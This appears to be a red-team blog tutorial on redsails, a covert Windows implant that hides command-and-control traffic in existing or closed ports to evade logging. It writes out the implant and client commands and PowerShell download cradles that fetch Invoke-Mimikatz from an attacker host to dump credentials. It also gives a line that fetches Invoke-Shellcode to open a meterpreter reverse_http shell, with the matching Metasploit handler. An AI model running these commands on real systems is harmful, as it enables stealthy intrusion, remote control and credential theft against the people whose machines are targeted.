Modern environments implement different level of security controls like endpoint solutions, host intrusion prevention systems, firewalls and real-time event log analysis. From the other hand red team engagements are trying to evade these controls in order to avoid being detected. However the majority of the tools will create some sort of noise on the network level or on the host level by producing various event logs.

R.J. Mcdown and Joshua Theimer have released a tool called redsails during DerbyCon 2017 which its purpose is to allow the red teamer to execute commands on the target host without creating any event logs or establishing a new connection. This tool is written in python and it uses an open source network driver (WinDivert) that interacts with the windows kernel in order to manipulate TCP traffic towards another host. The implant can use ports that are blocked by the windows firewall or not open in order to communicate back with the command and control server. It should be noted that the implant needs to be executed with administrator level privileges.

Redsails has the following dependencies:

pip install pydivert
pip install pbkdf2
easy_install pycrypto

The Microsoft Visual C++ compiler is also needed prior to the installation of pycrypto.

The implant needs to be executed on the target with the following parameters:

redsails.exe -a <IP Address> -p <password> -o <port>

The same port and password needs to be used and on the command and control server in order to establish a shell.

python redsailsClient.py -t <IP Address> -p <password> -o <port>
redsails - Client Parameters
redsails – Client Parameters

No new connections will established and the port will remain in listening mode even though there is a direct connection.

redsails - No Active Connections
redsails – No Active Connections

Even if a port is not open on the host it is still possible to use it for command execution without creating any new connections.

redsails - Port 22 is not Active
redsails – Port 22 is not Active
redsails - Shell via Closed Port
redsails – Shell via Closed Port

Commands can be executed from the redsails console on the target.

SHELL::net users
SHELL::whoami
SHELL::ipconfig
redsails - Executing Shell Commands
redsails – Executing Shell Commands

Redsails has also PowerShell support therefore it can execute PowerShell commands.

redsails - PowerShell
redsails – PowerShell

Additional PowerShell scripts can be used in order to perform further recon on the target or gather credentials from memory.

PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz
redsails - Executing Mimikatz
redsails – Executing Mimikatz

It is also possible to upgrade this shell to a meterpreter session by executing the Invoke-Shellcode powershell script.

PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_http -LHOST 192.168.100.2 -LPORT 8080
redsails - Execute Shellcode via PowerShell
redsails – Execute Shellcode via PowerShell

The following Metasploit module can be used to receive the connection:

exploit/multi/handler
set payload windows/meterpreter/reverse_http
redsails - Meterpreter Session
redsails – Meterpreter Session

However this will defeat the purpose of the tool since a new connection will be established and it would be easier to be detected by any host intrusion prevention system.

redsails - Meterpreter Connection Active
redsails – Meterpreter Connection Active

Reference

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s